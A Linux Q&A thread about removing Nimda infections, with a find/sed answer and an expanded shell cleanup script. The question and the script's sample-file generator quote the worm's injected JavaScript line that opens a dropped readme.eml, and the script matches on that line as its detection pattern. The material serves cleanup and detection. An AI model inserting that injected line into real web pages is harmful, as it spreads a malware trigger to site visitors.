Linux – Remove eml and HTML:Nimda viruses from the Linux machine

linux malware scripting windows

(yes, the title is strange, but read on…)

I copied some data from here and there on my Linux box and now I find so many eml and HTML:Nimda viruses on my system when I scan it using clamtk. The problem is that these are 1700+ files that I have to manually select and act on. Plus, clamtk doesn't clean it? Is there any other way possible to remove these viruses?

I have a finding to share: all infected html files contain:

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>

multiple times around the end of the file (the previous end, e.g. it is appended at the end of every html file).

So all I gotta do is:

  1. Search for all eml files and delete them. Some eml files' paths have spaces and other characters in them, so I will have to be careful here not to remove the directory or miss the file.

  2. Search for all html files and grep them for these lines; if the lines exist, I would have to delete any lines that match the pattern of:

<script language="JavaScript">window.open("readme.eml", null,

because the rest of the pattern varies a bit.

I think I need a shell script. My own scripting isn't really great, but I will try; in the meanwhile I am waiting here for answers.

Best Answer

# -print0 / read -d '' keep paths with spaces intact (a plain $(find ...) would
# split them); the pattern is the one from the question, dots escaped for sed
find . -type f -name '*.html' -print0 | while IFS= read -r -d '' file
do
    sed -i '/window\.open("readme\.eml"/d' "$file"
done
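A complete version of the two-step cleanup the question describes (strip the appended line from every html file, delete the dropped eml files, both without breaking on paths that contain spaces), written as an added example that is not part of the original answer. The helper names (clean_tree, count_infected_html, count_eml, make_sample_tree) and the sample directory tree it builds are this example's own constructions; the matched prefix is the one quoted in the question.

```sh
#!/bin/sh
# Added example, not code from the original post. Removes the Nimda-style
# line quoted in the question from every .html file and deletes the dropped
# .eml payloads, without breaking on paths that contain spaces.
# The helper names (clean_tree, count_infected_html, count_eml,
# make_sample_tree) are this example's own.

# The injected line starts with window.open("readme.eml"; the rest varies,
# so only that prefix is matched. Dots are escaped for grep's regex.
PATTERN='window\.open("readme\.eml"'

# Number of .html files under $1 that still carry the injected line.
# -exec ... {} + hands the paths to grep directly, so spaces are safe.
count_infected_html() {
    find "$1" -type f -name '*.html' -exec grep -l -e "$PATTERN" {} + | wc -l | tr -d ' '
}

# Number of .eml files under $1 (each one is a dropped payload here).
count_eml() {
    find "$1" -type f -name '*.eml' -print | wc -l | tr -d ' '
}

# Strip every line matching PATTERN from each .html file under $1, then
# delete every .eml file. A small inline sh script does the per-file work so
# no path is ever word-split; the filtered copy replaces the original only
# when grep -v succeeded (exit 0: some lines kept, exit 1: all lines removed).
clean_tree() {
    find "$1" -type f -name '*.html' -exec sh -c '
        pat=$1; shift
        for f in "$@"; do
            grep -q -e "$pat" "$f" || continue
            if grep -v -e "$pat" "$f" > "$f.cleaning" || [ $? -eq 1 ]; then
                mv "$f.cleaning" "$f"
            else
                rm -f "$f.cleaning"
            fi
        done' sh "$PATTERN" {} +
    find "$1" -type f -name '*.eml' -exec rm -f {} +
}

# Constructed sample tree under $1 (not real infected data): one html file
# with the appended line, one clean html file, two .eml files, all under
# directory names containing spaces.
make_sample_tree() {
    mkdir -p "$1/site dir/sub dir"
    printf '<html><body>hello</body></html>\n<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>\n' > "$1/site dir/index.html"
    printf '<html><body>clean</body></html>\n' > "$1/site dir/sub dir/page two.html"
    printf 'From: sample\n' > "$1/site dir/readme.eml"
    printf 'From: sample\n' > "$1/site dir/sub dir/read me.eml"
}

# Usage: sh clean_nimda.sh /path/to/copied/data
if [ -n "${1:-}" ]; then
    echo "before: $(count_infected_html "$1") infected html, $(count_eml "$1") eml"
    clean_tree "$1"
    echo "after:  $(count_infected_html "$1") infected html, $(count_eml "$1") eml"
fi
```

Run it against a copy of the data first and compare the before/after counts; the script only touches html files that actually contain the prefix, so clean files keep their timestamps, and swapping the final `rm -f` for a move into a quarantine directory is a one-line change if the eml files are wanted for later inspection.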